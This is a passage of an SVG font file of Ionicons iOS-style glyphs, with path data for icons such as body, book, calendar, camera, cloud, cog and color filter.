    <glyph glyph-name="ion-ios-body-outline" unicode="&#xf3e3;" horiz-adv-x="384" 
d="M192 400c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM192 416v0c27 0 48 -21 48 -48s-21 -48 -48 -48s-48 21 -48 48s21 48 48 48zM360 304c13 0 24 -11 24 -24s-11 -24 -24 -24h-100c-5 0 -14 -5 -18 -15c-5 -12 -2 -33 1 -51l4 -21v-1v0l32 -172
c2 -13 -6 -26 -19 -28h-5c-11 0 -22 8 -24 20l-21 120v0s-5 31 -17 31h-2c-12 0 -19 -31 -19 -31v0l-21 -120c-2 -12 -11 -20 -22 -20h-5c-13 2 -21 15 -19 28l32 172v1l4 21c3 18 6 39 1 51c-4 10 -12 15 -18 15h-100c-13 0 -24 11 -24 24s11 24 24 24h336zM24 272
c-4 0 -8 4 -8 8s4 8 8 8h336c4 0 8 -4 8 -8s-4 -8 -8 -8h-102c-16 0 -26 -15 -30 -24c-5 -13 -6 -32 -1 -61v0v0l3 -19l1 -3l32 -172c0 -3 0 -5 -1 -6s-2 -2 -5 -3h-2c-4 0 -7 2 -8 6l-21 120v0c0 2 -2 10 -5 19c-2 6 -5 11 -8 15c-7 9 -14 11 -20 11h-2
c-5 0 -13 -2 -20 -11c-3 -4 -6 -9 -8 -15c-4 -9 -6 -17 -6 -18v-1l-21 -120c-1 -4 -3 -6 -7 -6h-2c-3 0 -4 2 -5 3s-2 3 -1 6l32 172v0v1l4 21v0v0c5 29 5 48 0 61c-4 9 -14 24 -32 24z" />
    <glyph glyph-name="ion-ios-body" unicode="&#xf3e4;" horiz-adv-x="384" 
d="M144 368c0 32 16 48 48 48s48 -16 48 -48s-16 -48 -48 -48s-48 16 -48 48zM360 304c7 0 12 -2 17 -7s7 -10 7 -17s-2 -12 -7 -17s-10 -7 -17 -7h-98c-8 -2 -15 -6 -18 -14c-4 -9 -3 -27 1 -52l4 -21v-1v0l30 -172c1 -7 0 -13 -4 -18s-8 -9 -15 -10s-13 0 -18 4
s-9 9 -10 16l-21 120v-1l-2 9c-1 5 -3 11 -6 16s-6 8 -10 8h-2c-8 0 -14 -11 -18 -33v1l-21 -120c-1 -7 -5 -12 -10 -16s-11 -5 -18 -4s-11 5 -15 10s-5 11 -4 18l30 172v0v1l4 21c4 25 5 43 1 52c-3 8 -10 12 -18 14h-98c-7 0 -12 2 -17 7s-7 10 -7 17s2 12 7 17s10 7 17 7
h336z" />
    <glyph glyph-name="ion-ios-bolt-outline" unicode="&#xf3e5;" horiz-adv-x="226" 
d="M131 316l-100 -140h65h19l-3 -19l-17 -89l100 140h-65h-19l3 19zM160 384v0l-30 -160h96l-160 -224l30 160h-96z" />
    <glyph glyph-name="ion-ios-bolt" unicode="&#xf3e6;" horiz-adv-x="226" 
d="M160 384v0l-30 -160h96l-160 -224l30 160h-96z" />
    <glyph glyph-name="ion-ios-book-outline" unicode="&#xf3e7;" horiz-adv-x="384" 
d="M284 384c55 0 100 -26 100 -79v-1v-4v-261v-17h-6h-11h-5c-17 30 -44 42 -78 42c-40 0 -74 -28 -82 -64h-20c-8 36 -42 64 -82 64c-34 0 -65 -16 -78 -42h-5h-11h-6v9v264v9v1c0 53 45 79 100 79c41 0 78 -14 92 -44c12 30 51 44 92 44zM184 37v254v13v2
c-1 43 -39 62 -84 62c-44 0 -81 -19 -84 -61v-1v0v-262h1c19 26 48 36 83 36s66 -17 84 -43zM368 300v14v1c-3 42 -40 53 -84 53c-46 0 -84 -20 -84 -64v-1v-266c18 26 49 43 84 43s66 -10 84 -36v256z" />
    <glyph glyph-name="ion-ios-book" unicode="&#xf3e8;" horiz-adv-x="384" 
d="M100 384c35 0 67 -10 84 -31v-353h-2c-8 36 -42 64 -82 64c-34 0 -65 -16 -78 -42h-5h-11h-6v9v264v9v1c0 53 45 79 100 79zM284 384c55 0 100 -26 100 -79v-1v-4v-261v-17h-6h-11h-5c-17 30 -44 42 -78 42c-40 0 -74 -28 -82 -64h-2v353c17 21 50 31 84 31z" />
    <glyph glyph-name="ion-ios-bookmarks-outline" unicode="&#xf3e9;" horiz-adv-x="418" 
d="M385 384c19 0 33 -13 33 -32v-286c0 -19 -14 -34 -33 -34h-143s-25 -4 -25 -19v-13h-8h-8v13c0 15 -11 19 -25 19h-143c-19 0 -33 15 -33 34v286c0 19 14 32 33 32h150c10 0 20 -5 26 -12v0v0c6 7 16 12 26 12h150zM201 37v309c0 9 -12 22 -25 22h-143
c-9 0 -16 -7 -16 -16v-286c0 -9 7 -18 16 -18h144c10 0 19 -3 24 -11zM273 368v-100l23 14l9 6l9 -6l23 -14v100h-64zM401 66v286c0 9 -7 16 -16 16h-32v-131l-48 32l-48 -32v131h-15c-13 0 -25 -13 -25 -22v-309c5 9 14 11 24 11h144c9 0 16 9 16 18z" />
    <glyph glyph-name="ion-ios-bookmarks" unicode="&#xf3ea;" horiz-adv-x="418" 
d="M296 283l-23 -15v116h64v-116l-23 15l-9 6zM385 384c19 0 33 -13 33 -32v-286c0 -19 -14 -34 -33 -34h-143s-25 -4 -25 -19v-13h-8h-8v13c0 15 -11 19 -25 19h-143c-19 0 -33 15 -33 34v286c0 19 14 32 33 32h150s18 -8 18 -15v-329l8 -6l8 6v329s10 15 18 15h22v-146
l48 32l48 -32v146h32z" />
    <glyph glyph-name="ion-ios-box-outline" unicode="&#xf3eb;" horiz-adv-x="320" 
d="M192 208h-1h-63c-9 0 -16 -7 -16 -16s7 -16 16 -16h64c9 0 16 7 16 16s-7 16 -16 16zM192 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32h-64c-18 0 -32 14 -32 32s14 32 32 32h64zM320 336v-80h-16v-208h-288v208h-16v80h320zM288 64v192h-256v-192h256zM304 272v48h-288
v-48h288z" />
    <glyph glyph-name="ion-ios-box" unicode="&#xf3ec;" horiz-adv-x="320" 
d="M16 48v192h288v-192h-288zM128 208c-9 0 -16 -7 -16 -16s7 -16 16 -16h64c9 0 16 7 16 16s-7 16 -16 16h-64zM0 336h320v-80h-16h-288h-16v80z" />
    <glyph glyph-name="ion-ios-briefcase-outline" unicode="&#xf3ed;" horiz-adv-x="416" 
d="M368 320h48v-320h-416v320h48v16h32v-16h48v30v2c0 18 10 32 29 32h99c19 0 32 -14 32 -32v-2v-30h48v16h32v-16zM144 320v0h128v0v30c0 10 -7 18 -17 18h-97c-11 0 -14 -8 -14 -18v-30zM400 16v224h-384v-224h384zM400 256v48h-32v-16h-32v16h-256v-16h-32v16h-32v-48
h384z" />
    <glyph glyph-name="ion-ios-briefcase" unicode="&#xf3ee;" horiz-adv-x="416" 
d="M48 320v16h32v-16h-32zM0 0v240h416v-240h-416zM336 320v16h32v-16h-32zM368 320h48v-64h-416v64h48v-32h32v32h48v30v2c0 18 10 32 29 32h99c19 0 32 -14 32 -32v-2v-30h48v-32h32v32zM272 320v30c0 10 -7 18 -17 18h-97c-11 0 -14 -8 -14 -18v-30v0h128v0z" />
    <glyph glyph-name="ion-ios-browsers-outline" unicode="&#xf3ef;" horiz-adv-x="384" 
d="M0 304h304v-304h-304v304zM288 16v272h-272v-272h272zM384 384v-304h-64v16h48v272h-272v-48h-16v64h304z" />
    <glyph glyph-name="ion-ios-browsers" unicode="&#xf3f0;" horiz-adv-x="384" 
d="M0 304h304v-304h-304v304zM80 384h304v-304h-64v240h-240v64z" />
    <glyph glyph-name="ion-ios-calculator-outline" unicode="&#xf3f1;" horiz-adv-x="288" 
d="M32 288v64h224v-64h-224zM48 336v-32h192v32h-192zM256 384c18 0 32 -14 32 -32v-320c0 -18 -14 -32 -32 -32h-224c-18 0 -32 14 -32 32v320c0 18 14 32 32 32h224zM272 32v320c0 9 -7 16 -16 16h-224c-9 0 -16 -7 -16 -16v-320c0 -9 7 -16 16 -16h224c9 0 16 7 16 16z
M48 208h32h16v-16h-64v64h16v-16v-32zM48 128h32h16v-16h-64v64h16v-16v-32zM48 48h32h16v-16h-64v64h16v-16v-32zM128 208h32h16v-16h-64v64h16v-16v-32zM208 208h32h16v-16h-64v64h16v-16v-32zM128 128h32h16v-16h-64v64h16v-16v-32zM128 48h32h16v-16h-64v64h16v-16v-32z
M208 48h32h16v-16h-64v144h16v-96v-32z" />
    <glyph glyph-name="ion-ios-calculator" unicode="&#xf3f2;" horiz-adv-x="288" 
d="M256 384c18 0 32 -14 32 -32v-320c0 -18 -14 -32 -32 -32h-224c-18 0 -32 14 -32 32v320c0 18 14 32 32 32h224zM248 168h-48v-128h48v128zM248 248h-48v-48h48v48zM168 88h-48v-48h48v48zM168 168h-48v-48h48v48zM168 248h-48v-48h48v48zM88 88h-48v-48h48v48zM88 168
h-48v-48h48v48zM88 248h-48v-48h48v48zM40 296h208v48h-208v-48z" />
    <glyph glyph-name="ion-ios-calendar-outline" unicode="&#xf3f3;" horiz-adv-x="384" 
d="M16 336v-64h352v64zM288 352h96v-352h-384v352h96v32h16v-32h160v32h16v-32zM368 16v240h-352v-240h352zM368 272v64h-80v-32h-16v32h-160v-32h-16v32h-80v-64h352z" />
    <glyph glyph-name="ion-ios-calendar" unicode="&#xf3f4;" horiz-adv-x="384" 
d="M0 0v256h384v-256h-384zM384 352v-80h-384v80h96v-48h16v48h160v-48h16v48h96zM96 352v32h16v-32h-16zM272 352v32h16v-32h-16z" />
    <glyph glyph-name="ion-ios-camera-outline" unicode="&#xf3f5;" horiz-adv-x="384" 
d="M354 288c18 0 30 -13 30 -31v-176c0 -18 -12 -33 -30 -33h-320c-18 0 -34 15 -34 33v176c0 18 16 31 34 31h13v16h34v-16h13c32 36 43 48 55 48h88c12 0 23 -12 55 -48h62zM368 81v176c0 9 -5 15 -14 15h-62h-7l-5 3c-3 4 -7 8 -10 11c-12 13 -20 24 -26 30
c-5 5 -7 4 -7 4h-88s-2 0 -7 -4c-6 -5 -14 -14 -25 -27c-3 -4 -7 -10 -11 -14l-5 -3h-7h-60c-9 0 -18 -7 -18 -15v-176c0 -9 9 -17 18 -17h320c8 0 14 8 14 17zM192 258c47 0 86 -38 86 -85s-39 -85 -86 -85s-86 38 -86 85s39 85 86 85zM192 104c38 0 70 31 70 69
s-32 69 -70 69s-70 -31 -70 -69s32 -69 70 -69zM288 239v17h17v-17h-17zM160 173c0 21 11 32 32 32s32 -11 32 -32s-11 -32 -32 -32s-32 11 -32 32z" />
    <glyph glyph-name="ion-ios-camera" unicode="&#xf3f6;" horiz-adv-x="384" 
d="M354 288c18 0 30 -13 30 -31v-176c0 -18 -12 -33 -30 -33h-320c-18 0 -34 15 -34 33v176c0 18 16 31 34 31h13v16h34v-16h13c32 36 43 48 55 48h88c12 0 23 -12 55 -48h62zM192 88c47 0 86 38 86 85s-39 85 -86 85s-86 -38 -86 -85s39 -85 86 -85zM305 239v17h-17v-17h17
zM192 242c38 0 70 -31 70 -69s-32 -69 -70 -69s-70 31 -70 69s32 69 70 69zM192 141c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-ios-cart-outline" unicode="&#xf3f7;" horiz-adv-x="384" 
d="M96 48c13 0 24 -11 24 -24s-11 -24 -24 -24s-24 11 -24 24s11 24 24 24zM96 16c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8zM320 48c13 0 24 -11 24 -24s-11 -24 -24 -24s-24 11 -24 24s11 24 24 24zM320 16c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8zM384 320
l-16 -128l-271 -48l5 -30c7 -34 21 -34 26 -34h240v-16h-240c-11 0 -21 5 -28 14c-6 8 -11 19 -13 33l-43 234v0c-2 8 -3 12 -7 16c-6 5 -18 7 -37 7v16c23 0 38 -4 47 -11c7 -6 10 -14 12 -21zM355 206l11 99l-304 31l32 -176z" />
    <glyph glyph-name="ion-ios-cart" unicode="&#xf3f8;" horiz-adv-x="384" 
d="M96 48c13 0 24 -11 24 -24s-11 -24 -24 -24s-24 11 -24 24s11 24 24 24zM320 48c13 0 24 -11 24 -24s-11 -24 -24 -24s-24 11 -24 24s11 24 24 24zM384 320l-16 -128l-271 -48l5 -30c7 -34 21 -34 26 -34h240v-16h-240c-11 0 -21 5 -28 14c-6 8 -11 19 -13 33l-43 234v0
c-2 8 -3 12 -7 16c-6 5 -18 7 -37 7v16c23 0 38 -4 47 -11c7 -6 10 -14 12 -21z" />
    <glyph glyph-name="ion-ios-chatboxes-outline" unicode="&#xf3f9;" horiz-adv-x="416" 
d="M16 384v-192h96v-16h-112v224h288v-112h-16v96h-256zM128 272h288v-224h-48v-64h-13l-64 64h-163v224zM400 64v192h-256v-192h153l55 -55v55h48z" />
    <glyph glyph-name="ion-ios-chatboxes" unicode="&#xf3fa;" horiz-adv-x="416" 
d="M288 400v-112h-176v-112h-112v224h288zM128 272h288v-224h-48v-64h-13l-64 64h-163v224z" />
    <glyph glyph-name="ion-ios-chatbubble-outline" unicode="&#xf3fb;" horiz-adv-x="384" 
d="M192 336c-97 0 -176 -62 -176 -138c0 -26 10 -51 27 -73c0 -1 0 -2 1 -3s2 -1 2 -2c4 -6 6 -13 6 -20c0 -3 1 -3 -13 -47l39 17v0c2 1 10 4 11 4h1v0c5 2 10 3 16 3c5 0 9 -1 14 -2l1 -1h2c19 -6 41 -10 70 -10c48 0 92 15 125 40c32 25 50 58 50 94
c0 76 -79 138 -176 138zM192 352v0c106 0 192 -69 192 -154s-85 -150 -191 -150c-27 0 -52 3 -75 11h-2v0c-3 1 -6 2 -10 2s-9 -1 -12 -2h1h-1c-1 0 -9 -4 -10 -4l-50 -22l-2 -1h-3h-3c-6 1 -8 6 -7 10v0s17 57 17 58c0 4 -1 8 -3 11v0v0v0l1 -1l-4 4c-19 24 -30 53 -30 84
c0 85 86 154 192 154z" />
    <glyph glyph-name="ion-ios-chatbubble" unicode="&#xf3fc;" horiz-adv-x="384" 
d="M192 352v0c106 0 192 -69 192 -154s-85 -150 -191 -150c-27 0 -52 3 -75 11h-2v0c-3 1 -6 2 -10 2s-9 -1 -12 -2h1h-1c-1 0 -9 -4 -10 -4l-50 -22l-2 -1h-3h-3c-6 1 -8 6 -7 10v0s17 57 17 58c0 4 -1 8 -3 11v0v0v0l1 -1l-4 4c-19 24 -30 53 -30 84c0 85 86 154 192 154z
" />
    <glyph glyph-name="ion-ios-checkmark-empty" unicode="&#xf3fd;" horiz-adv-x="207" 
d="M74 118c-2 -2 -6 -4 -9 -4s-7 2 -9 4l-56 56l18 18l47 -47l125 126l17 -18z" />
    <glyph glyph-name="ion-ios-checkmark-outline" unicode="&#xf3fe;" horiz-adv-x="416" 
d="M292 271l18 -18l-134 -135c-2 -2 -6 -4 -9 -4s-7 2 -9 4l-56 56l18 18l47 -47zM208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191z" />
    <glyph glyph-name="ion-ios-checkmark" unicode="&#xf3ff;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM176 118l134 135l-18 18l-125 -126l-47 47l-18 -18l56 -56c2 -2 6 -4 9 -4s7 2 9 4z" />
    <glyph glyph-name="ion-ios-circle-filled" unicode="&#xf400;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191zM208 352c88 0 160 -72 160 -160s-72 -160 -160 -160s-160 72 -160 160s72 160 160 160z" />
    <glyph glyph-name="ion-ios-circle-outline" unicode="&#xf401;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191z" />
    <glyph glyph-name="ion-ios-clock-outline" unicode="&#xf402;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191zM208 192v128h17v-145h-113v17h96z" />
    <glyph glyph-name="ion-ios-clock" unicode="&#xf403;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM225 175v145h-17v-128h-96v-17h113z" />
    <glyph glyph-name="ion-ios-close-empty" unicode="&#xf404;" horiz-adv-x="192" 
d="M180 288l12 -12l-84 -84l84 -84l-12 -12l-84 84l-84 -84l-12 12l84 84l-84 84l12 12l84 -84z" />
    <glyph glyph-name="ion-ios-close-outline" unicode="&#xf405;" horiz-adv-x="416" 
d="M355 339c81 -81 81 -213 0 -294s-213 -81 -294 0s-81 213 0 294s213 81 294 0zM343 57c74 74 74 196 0 270s-196 74 -270 0s-74 -196 0 -270s196 -74 270 0zM292 288l12 -12l-84 -84l84 -84l-12 -12l-84 84l-84 -84l-12 12l84 84l-84 84l12 12l84 -84z" />
    <glyph glyph-name="ion-ios-close" unicode="&#xf406;" horiz-adv-x="416" 
d="M355 339c81 -81 81 -213 0 -294s-213 -81 -294 0s-81 213 0 294s213 81 294 0zM304 108l-84 84l84 84l-12 12l-84 -84l-84 84l-12 -12l84 -84l-84 -84l12 -12l84 84l84 -84z" />
    <glyph glyph-name="ion-ios-cloud-download-outline" unicode="&#xf407;" 
d="M161 67l55 -54v242h16v-242l55 54l12 -12l-75 -73l-74 73zM367 284c45 0 81 -37 81 -82s-37 -82 -82 -82v0h-101v16h97h4c37 0 66 30 66 66s-29 67 -66 67h-15v20c0 55 -46 97 -101 97c-38 0 -73 -22 -90 -56l-6 -14l-14 7c-6 3 -13 5 -20 5c-22 0 -40 -18 -44 -39l-1 -9
l-9 -3c-30 -10 -50 -36 -50 -67c0 -40 33 -74 74 -74h91v-16h-91c-50 0 -90 40 -90 89c0 39 26 71 61 83c5 28 29 51 59 51c10 0 18 -2 26 -6c19 39 59 65 105 65c64 0 117 -51 117 -115c0 -1 -1 -2 -1 -3z" />
    <glyph glyph-name="ion-ios-cloud-download" unicode="&#xf408;" 
d="M216 13v107h16v-107l55 54l12 -12l-75 -73l-74 73l11 12zM367 284c45 0 81 -37 81 -82s-37 -82 -82 -82h-134v135h-16v-135h-35h-21h-70c-50 0 -90 40 -90 89c0 39 26 71 61 83c5 28 29 51 59 51c10 0 18 -2 26 -6c19 39 59 65 105 65c64 0 117 -51 117 -115
c0 -1 -1 -2 -1 -3z" />
    <glyph glyph-name="ion-ios-cloud-outline" unicode="&#xf409;" 
d="M367 215c45 0 81 -37 81 -83c0 -45 -37 -84 -82 -84h-276c-50 0 -90 42 -90 92c0 40 26 71 61 83c5 28 29 52 59 52c10 0 18 -2 26 -6c19 39 59 67 105 67c64 0 117 -53 117 -117c0 -1 -1 -3 -1 -4zM366 64c37 0 66 32 66 69s-29 67 -66 67h-15v21c0 56 -46 99 -101 99
c-38 0 -73 -23 -90 -58l-6 -14l-14 7c-6 3 -13 5 -20 5c-22 0 -40 -17 -44 -39l-1 -9l-9 -3c-30 -10 -50 -37 -50 -69c0 -41 33 -76 74 -76h272h4z" />
    <glyph glyph-name="ion-ios-cloud-upload-outline" unicode="&#xf40a;" 
d="M161 188l-11 11l74 75l75 -75l-12 -11l-55 54v-242h-16v242zM367 264c45 0 81 -39 81 -85s-37 -83 -82 -83v0h-101v16h97h4c37 0 66 30 66 67s-29 70 -66 70l-15 1v20c0 56 -46 99 -101 99c-38 0 -73 -23 -90 -58l-6 -13l-14 6c-6 3 -13 5 -20 5c-22 0 -40 -17 -44 -39
l-1 -9l-9 -3c-30 -10 -50 -39 -50 -71c0 -41 33 -75 74 -75h91v-16h-91c-50 0 -90 40 -90 90c0 40 26 74 61 86c5 28 29 52 59 52c10 0 18 -2 26 -6c19 39 59 66 105 66c64 0 117 -52 117 -116c0 -1 -1 -3 -1 -4z" />
    <glyph glyph-name="ion-ios-cloud-upload" unicode="&#xf40b;" 
d="M216 0v96h16v-96h-16zM367 264c45 0 81 -39 81 -85s-37 -83 -82 -83h-134v146l55 -54l12 11l-75 75l-74 -75l11 -11l55 54v-146h-35h-31h-60c-50 0 -90 40 -90 90c0 40 26 74 61 86c5 28 29 52 59 52c10 0 18 -2 26 -6c19 39 59 66 105 66c64 0 117 -52 117 -116
c0 -1 -1 -3 -1 -4z" />
    <glyph glyph-name="ion-ios-cloud" unicode="&#xf40c;" 
d="M367 215c45 0 81 -37 81 -83c0 -45 -37 -84 -82 -84h-276c-50 0 -90 42 -90 92c0 40 26 71 61 83c5 28 29 52 59 52c10 0 18 -2 26 -6c19 39 59 67 105 67c64 0 117 -53 117 -117c0 -1 -1 -3 -1 -4z" />
    <glyph glyph-name="ion-ios-cloudy-night-outline" unicode="&#xf40d;" horiz-adv-x="384" 
d="M125 224c-34 0 -63 -28 -63 -62v-12s1 -10 1 -10c-5 0 -12 -1 -14 -1c-19 -3 -33 -18 -33 -37c0 -10 3 -19 10 -26s16 -11 26 -11h157c27 0 49 22 49 49s-22 50 -49 50c-2 0 -4 -1 -6 -1l-14 -2l-3 14c-3 14 -11 26 -22 35s-25 14 -39 14zM125 240v0c37 0 68 -26 76 -61
h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v8c0 43 35 78 78 78zM361 142c8 0 15 2 23 4c-4 -7 -9 -14 -14 -20c-21 -24 -50 -41 -84 -45c4 6 6 12 8 19c19 4 36 13 50 25c-18 1 -35 6 -50 13c-23 11 -42 29 -56 51
c-14 21 -22 48 -22 75c0 15 2 30 7 44c-24 -12 -43 -33 -53 -59c-5 2 -12 4 -18 5c14 36 45 65 82 77c8 2 16 4 24 5c-5 -6 -9 -13 -12 -20c-8 -16 -12 -34 -12 -52c0 -32 12 -63 35 -86s54 -36 86 -36h6z" />
    <glyph glyph-name="ion-ios-cloudy-night" unicode="&#xf40e;" horiz-adv-x="384" 
d="M361 142c8 0 15 2 23 4c-4 -7 -9 -15 -14 -21c-21 -24 -50 -40 -84 -44h-3c4 10 7 21 7 32c0 22 -9 43 -24 58c-14 15 -33 23 -53 24c-6 16 -16 29 -29 40c-10 8 -20 13 -32 17v2c14 36 45 65 82 77c8 2 16 4 24 5c-5 -6 -9 -13 -12 -20c-8 -16 -12 -34 -12 -52
c0 -32 12 -63 35 -86s54 -36 86 -36h6zM125 239v0c37 0 68 -26 76 -61h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v7c0 43 35 79 78 79z" />
    <glyph glyph-name="ion-ios-cloudy-outline" unicode="&#xf40f;" horiz-adv-x="274" 
d="M125 272c-34 0 -63 -28 -63 -62v-12s1 -10 1 -10c-6 0 -12 -1 -14 -1c-19 -3 -33 -18 -33 -37c0 -10 3 -19 10 -26s16 -11 26 -11h157c27 0 49 22 49 49s-22 50 -49 50c-2 0 -4 -1 -6 -1l-14 -2l-3 14c-3 14 -11 26 -22 35s-25 14 -39 14zM125 288v0c37 0 68 -26 76 -61
h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v8c0 43 35 78 78 78z" />
    <glyph glyph-name="ion-ios-cloudy" unicode="&#xf410;" horiz-adv-x="274" 
d="M125 288v0c37 0 68 -26 76 -61h8c36 0 65 -29 65 -65s-29 -66 -65 -66h-157c-28 0 -52 24 -52 53c0 27 21 51 47 53v8c0 43 35 78 78 78z" />
    <glyph glyph-name="ion-ios-cog-outline" unicode="&#xf411;" horiz-adv-x="384" 
d="M384 175l-33 -8l-3 -14l27 -20l-12 -30l-34 5l-8 -11l17 -29l-23 -23l-29 17l-10 -7l5 -34l-29 -12l-21 27l-14 -3l-8 -33h-32l-9 33l-13 3l-21 -28l-29 12l4 34l-11 8l-30 -19l-23 23l18 31l-7 11l-35 -5l-12 29l28 22l-2 12l-35 9v32l35 9l2 12l-29 22l12 30l36 -5
l7 10l-19 32l22 22l32 -19l11 8l-4 35l29 13l22 -29l12 2l9 35h32l9 -35l12 -2l22 28l29 -12l-5 -35l11 -8l30 18l22 -23l-17 -30l7 -10l35 5l12 -30l-28 -21l3 -13l33 -9v-32zM356 127l-26 20l6 33l32 8v7l-32 8l-6 33l26 19l-3 7l-32 -5l-19 27l17 28l-5 6l-28 -17l-28 18
l5 34l-6 2l-20 -26l-32 6l-8 33h-7l-9 -33l-32 -6l-20 27l-7 -3l5 -34l-28 -18l-9 6l-21 12l-5 -5l18 -30l-18 -27l-33 5l-3 -7l27 -20l-6 -32l-33 -8v-7l33 -9l6 -32l-27 -20l3 -6l33 4l18 -27l-17 -29l5 -6l29 18l28 -18l-5 -33l7 -3l19 27l33 -7l8 -31h8l7 31l33 7
l20 -26l7 3l-5 32l26 18l28 -16l5 5l-16 27l19 28l32 -4zM192 320c71 0 128 -57 128 -128s-57 -128 -128 -128s-128 57 -128 128s57 128 128 128zM80 192c0 -7 1 -15 2 -22l104 28l28 104c-7 1 -15 2 -22 2c-30 0 -58 -12 -79 -33s-33 -49 -33 -79zM192 80c27 0 53 10 73 27
l-75 75l-104 -28c6 -15 15 -29 27 -41c21 -21 49 -33 79 -33zM276 118c18 20 28 47 28 74c0 30 -12 58 -33 79c-12 12 -26 22 -42 27l-28 -105z" />
    <glyph glyph-name="ion-ios-cog" unicode="&#xf412;" horiz-adv-x="384" 
d="M229 298c16 -5 30 -15 42 -27c21 -21 33 -49 33 -79c0 -27 -10 -54 -28 -74l-75 75zM214 302l-28 -104l-104 -28c-1 7 -2 15 -2 22c0 30 12 58 33 79s49 33 79 33c7 0 15 -1 22 -2zM86 154l104 28l75 -75c-20 -17 -46 -27 -73 -27c-30 0 -58 12 -79 33
c-12 12 -21 26 -27 41zM384 175l-33 -8l-3 -14l27 -20l-12 -30l-34 5l-8 -11l17 -29l-23 -23l-29 17l-10 -7l5 -34l-29 -12l-21 27l-14 -3l-8 -33h-32l-9 33l-13 3l-21 -28l-29 12l4 34l-11 8l-30 -19l-23 23l18 31l-7 11l-35 -5l-12 29l28 22l-2 12l-35 9v32l35 9l2 12
l-29 22l12 30l36 -5l7 10l-19 32l22 22l32 -19l11 8l-4 35l29 13l22 -29l12 2l9 35h32l9 -35l12 -2l22 28l29 -12l-5 -35l11 -8l30 18l22 -23l-17 -30l7 -10l35 5l12 -30l-28 -21l3 -13l33 -9v-32zM192 64c71 0 128 57 128 128s-57 128 -128 128s-128 -57 -128 -128
s57 -128 128 -128z" />
    <glyph glyph-name="ion-ios-color-filter-outline" unicode="&#xf413;" horiz-adv-x="384" 
d="M302 236c47 -13 82 -57 82 -108c0 -62 -50 -112 -112 -112c-31 0 -60 13 -80 34c-20 -21 -49 -34 -80 -34c-62 0 -112 50 -112 112c0 51 35 95 82 108c-1 7 -2 13 -2 20c0 62 50 112 112 112s112 -50 112 -112c0 -7 -1 -13 -2 -20zM96 256c0 -6 0 -12 1 -17
c5 1 10 1 15 1c31 0 60 -13 80 -34c20 21 49 34 80 34c5 0 10 0 15 -1c1 5 1 11 1 17c0 53 -43 96 -96 96s-96 -43 -96 -96zM208 128c0 6 0 12 -1 17c-5 -1 -10 -1 -15 -1s-10 0 -15 1c-1 -5 -1 -11 -1 -17c0 -20 6 -38 16 -53c10 15 16 33 16 53zM192 160c3 0 7 1 10 1
c-3 7 -6 14 -10 20c-4 -6 -7 -13 -10 -20c3 0 7 -1 10 -1zM166 164c4 11 9 21 16 30c-18 18 -43 30 -70 30c-3 0 -7 -1 -10 -1c10 -29 34 -51 64 -59zM202 194c7 -9 12 -19 16 -30c30 8 54 30 64 59c-3 0 -7 1 -10 1c-27 0 -52 -12 -70 -30zM112 32c27 0 52 12 70 30
c-14 19 -22 41 -22 66c0 7 1 13 2 20c-36 10 -64 37 -76 72c-40 -11 -70 -48 -70 -92c0 -53 43 -96 96 -96zM272 32c53 0 96 43 96 96c0 44 -30 81 -70 92c-12 -35 -40 -62 -76 -72c1 -7 2 -13 2 -20c0 -25 -8 -47 -22 -66c18 -18 43 -30 70 -30z" />
    <glyph glyph-name="ion-ios-color-filter" unicode="&#xf414;" horiz-adv-x="384" 
d="M302 236c47 -13 82 -57 82 -108c0 -62 -50 -112 -112 -112c-31 0 -60 13 -80 34c-20 -21 -49 -34 -80 -34c-62 0 -112 50 -112 112c0 51 35 95 82 108c-1 7 -2 13 -2 20c0 62 50 112 112 112s112 -50 112 -112c0 -7 -1 -13 -2 -20zM192 53l1 -2c3 3 6 7 9 11
c14 19 22 41 22 66c0 7 -1 13 -2 20c36 10 64 37 76 72c2 5 3 10 4 15c-1 0 -2 1 -3 1v1c-4 1 -8 1 -12 2c-5 1 -10 1 -15 1c-31 0 -60 -13 -80 -34c-20 21 -49 34 -80 34c-5 0 -10 0 -15 -1c-4 -1 -8 -1 -12 -2v-1c-1 0 -2 -1 -3 -1c1 -5 2 -10 4 -15c12 -35 40 -62 76 -72
c-1 -7 -2 -13 -2 -20c0 -25 8 -47 22 -66c3 -4 6 -8 9 -11zM207 145c1 -5 1 -11 1 -17c0 -20 -6 -38 -16 -53c-10 15 -16 33 -16 53c0 6 0 12 1 17c5 -1 10 -1 15 -1s10 0 15 1zM282 223c-10 -29 -34 -51 -64 -59c-4 11 -9 21 -16 30c18 18 43 30 70 30c3 0 7 -1 10 -1z
M202 161c-3 0 -7 -1 -10 -1s-7 1 -10 1c3 7 6 14 10 20c4 -6 7 -13 10 -20zM112 224c27 0 52 -12 70 -30c-7 -9 -12 -19 -16 -30c-30 8 -54 30 -64 59c3 0 7 1 10 1z" />
